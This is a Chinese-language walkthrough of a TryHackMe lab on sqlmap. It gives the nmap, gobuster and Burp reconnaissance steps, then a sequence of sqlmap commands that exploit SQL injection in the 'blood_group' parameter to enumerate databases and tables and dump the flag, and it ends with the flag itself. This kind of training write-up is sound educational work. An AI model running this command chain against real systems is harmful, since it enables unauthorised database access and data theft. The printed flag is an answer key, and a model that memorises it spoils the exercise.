本文相关的TryHackMe实验练习房间链接:TryHackMe | SQLMAP
拿到ip先nmap扫一下
顺便扫个目录
gobuster dir -u 10.10.158.46 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
看不懂英语思密达...
不出意外search肯定有东西
我们bp抓包试试
不出意外blood_group是易受攻击的参数
cat查看一下
接下来就开始正题了
sqlmap -r test.txt -p blood_group --batch --current-user
简单解释一下:-r用于读取文件,-p用于提供易受攻击的参数,--batch表示测试过程中, 执行所有默认配置,--current-user检索DBMS当前用户
爆破数据库
sqlmap -r test.txt -p blood_group --batch --dbs
我们先尝试爆破blood表
sqlmap -r test.txt -p blood_group --batch -D blood --tables
接下来就是拿flag了
sqlmap -r test.txt -p blood_group --batch --dump -D blood -T flag
拿到flag:thm{sqlm@p_is_L0ve}